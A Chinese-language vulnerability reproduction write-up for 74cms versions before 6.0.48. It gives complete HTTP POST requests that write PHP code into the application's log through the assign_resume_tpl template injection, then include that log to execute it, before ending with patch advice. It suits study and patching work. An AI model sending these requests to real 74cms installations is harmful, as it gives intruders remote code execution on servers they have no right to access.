简介
骑士cms人才系统,是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才网站系统
漏洞概述
公告地址:
http://www.74cms.com/news/show-2497.html
/Application/Common/Controller/BaseController.class.php文件的assign_resume_tpl函数因为过滤不严格,导致了模板注入,可以进行远程命令执行。
影响版本
骑士 CMS < 6.0.48
环境搭建
这里使用phpstudy进行搭建
下载地址:
http://www.74cms.com/download/index.html
我这里使用php5.5.9版本进行安装
安装完毕
漏洞复现
发送数据包
http://your-ip/index.php?m=home&a=assign_resume_tpl
POST:
variable=1&tpl=<?php phpinfo(); ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>
POST /upload/index.php?m=home&a=assign_resume_tpl HTTP/1.1
Host: 192.168.1.102
Content-Length: 102
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.23.128
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.23.128/74cms_v6.0.20/upload/index.php?m=home&a=assign_resume_tpl
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,vi;q=0.8,id;q=0.7
Cookie: PHPSESSID=ktl5a9hhct39p0vsnh7pjc2nhn; think_language=zh-CN; think_template=default
Connection: close
variable=1&tpl=<?php phpinfo(); ob_flush();?>/r/n<qscms/company_show h
="info" id="$_GET['id']"/>
可以发现日志已经记录了错误
\upload\data\Runtime\Logs\Home
接着包含日志
http://your-ip/index.php?m=home&a=assign_resume_tpl
POST:
variable=1&tpl=data/Runtime/Logs/Home/20_12_22.log
日志名称就是当天的年月日
POST /upload/index.php?m=home&a=assign_resume_tpl HTTP/1.1
Host: 192.168.1.102
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
Origin: http://192.168.1.102
Connection: close
Referer: http://192.168.1.102/upload/index.php?m=home&a=assign_resume_tpl
Cookie: PHPSESSID=aitev5o1kse9c0tqlisua983s3; think_language=zh-CN; think_template=default
Upgrade-Insecure-Requests: 1
variable=1&tpl=data%2FRuntime%2FLogs%2FHome%2F20_12_22.log
修复建议
下载最新补丁包
http://www.74cms.com/download/index.html